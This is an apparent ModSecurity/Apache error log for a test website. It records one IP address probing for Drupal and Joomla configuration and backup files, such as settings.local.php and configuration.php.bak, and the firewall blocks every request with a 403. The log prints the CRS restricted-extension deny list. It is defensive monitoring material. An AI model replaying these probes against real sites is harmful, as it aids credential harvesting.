[Fri Jan 16 03:19:55.096167 2026] [:error] [pid 1444031] [client 45.148.10.246:35912] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/settings.local.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.local.php found within REQUEST_FILENAME: /sites/default/settings.local.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php"] [unique_id "aWmgS3-9MmrgwjmYTAJThgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.local.php
[Fri Jan 16 03:19:55.096400 2026] [:error] [pid 1444031] [client 45.148.10.246:35912] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php"] [unique_id "aWmgS3-9MmrgwjmYTAJThgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.local.php
[Fri Jan 16 03:19:55.096561 2026] [:error] [pid 1444031] [client 45.148.10.246:35912] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php"] [unique_id "aWmgS3-9MmrgwjmYTAJThgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.local.php
[Fri Jan 16 03:19:55.308464 2026] [:error] [pid 1444226] [client 45.148.10.246:35914] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/settings.local.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.local.php found within REQUEST_FILENAME: /sites/default/settings.local.php/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php/"] [unique_id "aWmgS2cpoCUgeFICb0bfPgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.local.php/
[Fri Jan 16 03:19:55.308702 2026] [:error] [pid 1444226] [client 45.148.10.246:35914] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php/"] [unique_id "aWmgS2cpoCUgeFICb0bfPgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.local.php/
[Fri Jan 16 03:19:55.308874 2026] [:error] [pid 1444226] [client 45.148.10.246:35914] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php/"] [unique_id "aWmgS2cpoCUgeFICb0bfPgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.local.php/
[Fri Jan 16 03:19:55.664488 2026] [:error] [pid 1444034] [client 45.148.10.246:35936] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/settings.local.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.local.php found within REQUEST_FILENAME: /sites/default/settings.local.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php"] [unique_id "aWmgS-RfEYyDES-ZFL4ibQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/settings.local.php
[Fri Jan 16 03:19:55.664741 2026] [:error] [pid 1444034] [client 45.148.10.246:35936] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php"] [unique_id "aWmgS-RfEYyDES-ZFL4ibQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/settings.local.php
[Fri Jan 16 03:19:55.664914 2026] [:error] [pid 1444034] [client 45.148.10.246:35936] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.local.php"] [unique_id "aWmgS-RfEYyDES-ZFL4ibQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/settings.local.php
[Fri Jan 16 03:19:56.559890 2026] [:error] [pid 1444226] [client 45.148.10.246:35990] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/default.settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/default.settings.php found within REQUEST_FILENAME: /sites/default/default.settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTGcpoCUgeFICb0bfPwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/default.settings.php
[Fri Jan 16 03:19:56.560132 2026] [:error] [pid 1444226] [client 45.148.10.246:35990] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTGcpoCUgeFICb0bfPwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/default.settings.php
[Fri Jan 16 03:19:56.560291 2026] [:error] [pid 1444226] [client 45.148.10.246:35990] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTGcpoCUgeFICb0bfPwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/default.settings.php
[Fri Jan 16 03:19:56.735641 2026] [:error] [pid 1444034] [client 45.148.10.246:36000] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/default.settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/default.settings.php found within REQUEST_FILENAME: /sites/default/default.settings.php/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php/"] [unique_id "aWmgTORfEYyDES-ZFL4ibgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/default.settings.php/
[Fri Jan 16 03:19:56.735912 2026] [:error] [pid 1444034] [client 45.148.10.246:36000] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php/"] [unique_id "aWmgTORfEYyDES-ZFL4ibgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/default.settings.php/
[Fri Jan 16 03:19:56.736080 2026] [:error] [pid 1444034] [client 45.148.10.246:36000] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php/"] [unique_id "aWmgTORfEYyDES-ZFL4ibgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/default.settings.php/
[Fri Jan 16 03:19:56.886159 2026] [:error] [pid 1444035] [client 45.148.10.246:36010] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/default.settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/default.settings.php found within REQUEST_FILENAME: /sites/default/default.settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTLauW6yeGWXfDeFXggAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//sites/default/default.settings.php
[Fri Jan 16 03:19:56.886429 2026] [:error] [pid 1444035] [client 45.148.10.246:36010] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTLauW6yeGWXfDeFXggAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//sites/default/default.settings.php
[Fri Jan 16 03:19:56.886605 2026] [:error] [pid 1444035] [client 45.148.10.246:36010] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTLauW6yeGWXfDeFXggAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//sites/default/default.settings.php
[Fri Jan 16 03:19:57.047188 2026] [:error] [pid 1444033] [client 45.148.10.246:36012] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/default.settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/default.settings.php found within REQUEST_FILENAME: /sites/default/default.settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTdLJkp65ULFQ2YYihgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/default.settings.php
[Fri Jan 16 03:19:57.047420 2026] [:error] [pid 1444033] [client 45.148.10.246:36012] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTdLJkp65ULFQ2YYihgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/default.settings.php
[Fri Jan 16 03:19:57.047588 2026] [:error] [pid 1444033] [client 45.148.10.246:36012] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/default.settings.php"] [unique_id "aWmgTdLJkp65ULFQ2YYihgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/default.settings.php
[Fri Jan 16 03:20:07.698506 2026] [:error] [pid 1444032] [client 45.148.10.246:41674] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.bak"] [unique_id "aWmgV-kMvq8uPO2ZciWrDAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/configuration.php.bak
[Fri Jan 16 03:20:07.698850 2026] [:error] [pid 1444032] [client 45.148.10.246:41674] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.bak"] [unique_id "aWmgV-kMvq8uPO2ZciWrDAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/configuration.php.bak
[Fri Jan 16 03:20:07.699029 2026] [:error] [pid 1444032] [client 45.148.10.246:41674] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.bak"] [unique_id "aWmgV-kMvq8uPO2ZciWrDAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/configuration.php.bak
[Fri Jan 16 03:20:08.073096 2026] [:error] [pid 1444034] [client 45.148.10.246:41700] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.bak"] [unique_id "aWmgWORfEYyDES-ZFL4ieAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//configuration.php.bak
[Fri Jan 16 03:20:08.073418 2026] [:error] [pid 1444034] [client 45.148.10.246:41700] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.bak"] [unique_id "aWmgWORfEYyDES-ZFL4ieAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//configuration.php.bak
[Fri Jan 16 03:20:08.073595 2026] [:error] [pid 1444034] [client 45.148.10.246:41700] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.bak"] [unique_id "aWmgWORfEYyDES-ZFL4ieAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//configuration.php.bak
[Fri Jan 16 03:20:08.375134 2026] [:error] [pid 1444035] [client 45.148.10.246:41704] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWLauW6yeGWXfDeFXjQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/configuration.php.old
[Fri Jan 16 03:20:08.375474 2026] [:error] [pid 1444035] [client 45.148.10.246:41704] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWLauW6yeGWXfDeFXjQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/configuration.php.old
[Fri Jan 16 03:20:08.375635 2026] [:error] [pid 1444035] [client 45.148.10.246:41704] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWLauW6yeGWXfDeFXjQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/configuration.php.old
[Fri Jan 16 03:20:08.723883 2026] [:error] [pid 1444032] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWOkMvq8uPO2ZciWrDQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//configuration.php.old
[Fri Jan 16 03:20:08.724222 2026] [:error] [pid 1444032] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWOkMvq8uPO2ZciWrDQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//configuration.php.old
[Fri Jan 16 03:20:08.724391 2026] [:error] [pid 1444032] [client 45.148.10.246:41734] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/configuration.php.old"] [unique_id "aWmgWOkMvq8uPO2ZciWrDQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//configuration.php.old
